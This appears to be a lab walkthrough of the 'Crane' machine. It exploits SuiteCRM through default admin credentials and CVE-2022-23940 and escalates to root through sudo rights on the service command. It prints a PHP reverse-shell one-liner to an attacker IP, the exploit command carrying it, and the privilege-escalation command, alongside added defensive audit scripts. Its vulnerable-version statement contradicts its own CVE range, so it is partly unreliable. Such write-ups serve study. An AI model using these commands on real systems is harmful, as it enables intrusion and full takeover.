Introduction
In this walkthrough, we explore the “Crane” machine from OffSec’s Proving Grounds. This walkthrough demonstrates the importance of thorough enumeration and leveraging known vulnerabilities for exploitation.
Port Scanning
We initiate with an Nmap scan to identify open ports:
- 22/tcp: SSH
- 80/tcp: HTTP
- 3306/tcp: MySQL
- 33060/tcp: MySQLX
Web Enumeration
Accessing port 80 reveals a SuiteCRM login page. During the evaluation, a critical security flaw was identified: the SuiteCRM instance allowed administrative access using the default credentials, `admin:admin`.
This vulnerability arises from the common oversight of failing to change the default login credentials after installation, leaving the system highly susceptible to unauthorized access and potential exploitation. Addressing such weaknesses is essential to improving the overall security posture.
Exploitation
Version 7.12.3 of SuiteCRM is vulnerable to CVE-2022-23940, allowing remote code execution.
CVE-2022-23940
CVE-2022-23940 is a critical security vulnerability identified in SuiteCRM versions up to 7.12.1 and 8.x up to 8.0.1. This flaw allows authenticated users with access to the Scheduled Reports module to execute arbitrary code on the server by exploiting PHP deserialization in the `email_recipients` property.
Technical Details:
The vulnerability arises from improper handling of serialized data in the `email_recipients` field. Attackers can craft a malicious report containing a PHP deserialization payload in this field. When the report is accessed, the backend deserializes the content, leading to the execution of the payload. This can be exploited using PHP deserialization gadgets, such as Monolog/RCE1 from phpggc, to achieve remote code execution.
Impact:
Exploitation of this vulnerability can compromise the confidentiality, integrity, and availability of the affected system. The National Vulnerability Database (NVD) has assigned it a CVSS score of 8.8, categorizing it as a high-severity issue.
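As an added defender-side check (not part of the original walkthrough or of SuiteCRM's own code), the script below parses stored `email_recipients` values with a small PHP `serialize()` reader and reports any row that carries an object (`O:`/`C:`) token or that fails to parse. It assumes legitimate values are serialized arrays of strings; the sample rows and the class name are constructed.

```python
def _walk(data, pos, found):
    """Parse one PHP-serialized value at pos; collect O:/C: class names in found."""
    t = data[pos]
    if t in 'NibdrR':                     # N;  i:5;  b:1;  d:0.5;  r:2;
        return data.index(';', pos) + 1
    if t not in 'saOC':
        raise ValueError('unknown token %r at %d' % (t, pos))
    colon = data.index(':', pos + 2)
    n = int(data[pos + 2:colon])          # string length, element count or name length
    if t == 's':                          # s:5:"hello";
        end = colon + 2 + n               # past :" and the n payload characters
        if data[end:end + 2] != '";':
            raise ValueError('bad string length at %d' % pos)
        return end + 2
    if t in 'OC':                         # O:4:"Name":1:{...}   C:4:"Name":3:{raw}
        found.append(data[colon + 2:colon + 2 + n])
        pos = colon + n + 4               # past "Name":
        colon = data.index(':', pos)
        n = int(data[pos:colon])          # property count (O) or raw byte length (C)
    pos = colon + 2                       # past :{
    if t == 'C':                          # C: wraps n opaque bytes, nothing nested
        pos += n
    else:                                 # a: and O: hold n key/value pairs
        for _ in range(n):
            pos = _walk(data, _walk(data, pos, found), found)   # key, then value
    if data[pos] != '}':
        raise ValueError('unterminated container at %d' % pos)
    return pos + 1

def serialized_php_classes(data):         # every class name an O:/C: token references
    found = []
    if _walk(data, 0, found) != len(data):
        raise ValueError('trailing data after value')
    return found

def audit_email_recipients(rows):         # (report_id, email_recipients) -> (report_id, reason)
    findings = []
    for report_id, value in rows:
        try:
            reasons = serialized_php_classes(value)      # class names found in the value
        except (ValueError, IndexError) as exc:          # malformed data is suspicious too
            reasons = ['unparseable: %s' % exc]
        if reasons:
            findings.append((report_id, '; '.join(reasons)))
    return findings

# Constructed sample rows (not from the machine); legitimate values are assumed to be
# serialized arrays of strings. rpt-2 only *contains* text that looks like an object.
SAMPLE_ROWS = [('rpt-1', 'a:2:{i:0;s:15:"alice@corp.test";i:1;s:13:"bob@corp.test";}'),
               ('rpt-2', 'a:1:{i:0;s:15:"O:4:"Evil":0:{}";}'),
               ('rpt-3', 'a:1:{i:0;O:17:"ConstructedGadget":1:{s:1:"x";i:1;}}')]
```

Because the reader walks the structure rather than grepping for `O:`, rpt-2 is not a false positive while rpt-3 is reported; the same scan can be pointed at a database dump or at the request bodies of report edits.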
We utilize a publicly available exploit from GitHub, crafting a PHP reverse shell payload:
```bash
php -r '$sock=fsockopen("192.168.45.231", 4545);exec("/bin/sh -i <&3 >&3 2>&3");'
```
The payload is handed to the exploit script together with the default credentials:
```bash
python3 exploit.py -h http://192.168.249.146 -u admin -p admin --payload "php -r '$sock=fsockopen(\"192.168.45.231\", 4545);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
```
Executing the exploit grants us a reverse shell.
Privilege Escalation Via Sudo
Running `sudo -l` reveals we can execute `/usr/sbin/service` without a password. By executing:
```bash
sudo /usr/sbin/service /////bin/bash
```
The multiple slashes (`/////`) in the command are collapsed during path resolution, so the argument still resolves to `/bin/bash`. They might be used to obfuscate the command or to attempt bypassing naive path checks. The key aspect of the exploitation is forcing the `service` command to execute `/bin/bash` with elevated (root) privileges.
When the command is executed:
```bash
sudo /usr/sbin/service /////bin/bash
```
It triggers the `service` utility to interpret `/bin/bash` as its target, effectively launching a new shell session with root privileges. This grants full access to the system as the root user, enabling privilege escalation.
We obtain a root shell. Navigating to the root directory, we access the `proof.txt` file, completing the challenge.
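As an added defender-side check that is not part of the original walkthrough, the audit below parses sudoers-style rules and reports NOPASSWD entries that grant `service` with no argument restriction, since a rule with a fixed argument list would not permit the path substitution shown above. The sudoers excerpt is constructed, and the `www-data` account is an assumption because the walkthrough does not name the account holding the right.

```python
import re

# The walkthrough's escalation path: sudo rights on `service`, which runs whatever path
# it is handed as the service name. A NOPASSWD rule with no argument list is therefore
# equivalent to an unrestricted root shell; a rule that pins the arguments is not.
SHELL_CAPABLE = {'/usr/sbin/service', '/sbin/service'}

# user_or_%group  host = (runas) [TAG:] cmd [args][, [TAG:] cmd ...]
RULE_RE = re.compile(r'^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$')

def parse_sudoers(text):
    """Yield (who, runas, nopasswd, command) for every command in sudoers-style text."""
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()            # drop comments and blank lines
        if not line or line.startswith(('Defaults', 'Cmnd_Alias', 'User_Alias')):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = False                                # sudo's default is PASSWD
        for cmd in m.group('spec').split(','):
            cmd = cmd.strip()
            # A tag such as NOPASSWD: applies to this and every later command in the list
            while ':' in cmd and cmd.split(':', 1)[0].isupper():
                tag, cmd = (part.strip() for part in cmd.split(':', 1))
                nopasswd = {'NOPASSWD': True, 'PASSWD': False}.get(tag, nopasswd)
            yield m.group('who'), m.group('runas') or 'root', nopasswd, cmd

def risky_service_rules(text):
    """Rules that run `service` as root, without a password, with any arguments."""
    return [e for e in parse_sudoers(text)
            if e[2] and e[3] in SHELL_CAPABLE and e[1].split(':')[0] in ('root', 'ALL')]

# Constructed sudoers excerpt (not the machine's real file). Only the www-data rule is
# reported: deploy's NOPASSWD rule pins the arguments, so `service` cannot be redirected.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
%sudo           ALL=(ALL:ALL) ALL
www-data        ALL=(ALL) NOPASSWD: /usr/sbin/service          # any argument accepted
deploy          ALL=(root) NOPASSWD: /usr/sbin/service apache2 restart, /usr/bin/systemctl status nginx
"""
```

The remediation the check points at is either removing the rule or rewriting it with an explicit argument list, as in the constructed `deploy` entry.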
Overview of SuiteCRM
SuiteCRM is an open-source Customer Relationship Management (CRM) software designed to help businesses manage their relationships with customers, streamline processes, and enhance sales and marketing efforts. It is a free alternative to proprietary CRM platforms such as Salesforce, providing similar functionality without licensing costs.
Key Features of SuiteCRM:
- Contact Management: Centralized repository for storing customer data, including contact details, interactions, and preferences.
- Sales Management: Tools to track leads, opportunities, and the sales pipeline, allowing businesses to forecast revenue and manage sales strategies.
- Marketing Automation: Campaign management tools to execute email marketing, track campaign performance, and generate leads.
- Customer Support: Case management, ticketing systems, and customer service workflows for handling support queries.
- Workflow Automation: Custom workflows to automate repetitive tasks and improve efficiency.
- Customizable Dashboards: Visualize key metrics, such as sales performance and customer engagement, with tailored dashboards.
- Reporting and Analytics: Generate detailed reports to gain insights into business performance and customer behavior.
Advantages of SuiteCRM:
- Open Source: Free to use, modify, and distribute, making it highly customizable.
- Community Support: Backed by a robust community that actively contributes to development and support.
- Integration: Compatible with other software systems, such as email platforms and third-party applications.
- Scalability: Suitable for businesses of all sizes, from startups to large enterprises.
Use Cases:
- Small businesses looking for cost-effective CRM solutions.
- Organizations needing customizable workflows and reports.
- Enterprises that prefer hosting their CRM on-premise for better control over data security.
Deployment Options:
- On-Premise: Installed on the company’s servers, giving full control over data and customizations.
- Cloud-Based: Hosted in the cloud for easy access and minimal maintenance.